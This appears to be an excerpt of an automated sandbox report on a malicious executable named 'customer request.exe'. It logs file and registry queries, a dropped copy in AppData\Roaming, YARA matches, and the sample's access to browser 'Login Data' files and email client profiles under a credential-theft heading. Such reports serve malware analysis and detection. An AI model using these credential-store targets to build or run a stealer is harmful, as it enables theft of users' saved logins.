            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Users\user\Desktop\customer request.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\customer request.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.customer request.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4b999b0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4c7bbe8.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d3e188.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d1d568.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4137608364.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4137995845.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4137995845.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4137608364.0000000002E3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4133955446.000000000041A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4137608364.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.4137995845.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: customer request.exe PID: 6848, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tjvxuavKFXO.exe PID: 7348, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tjvxuavKFXO.exe PID: 7488, type: MEMORYSTR
            Source: Yara matchFile source: 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: customer request.exe PID: 1908, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: tjvxuavKFXO.exe PID: 7488, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\customer request.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\customer request.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara matchFile source: 10.2.tjvxuavKFXO.exe.4b999b0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d3e188.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.customer request.exe.4d1d568.5.unpack, type: UNPACKEDPE
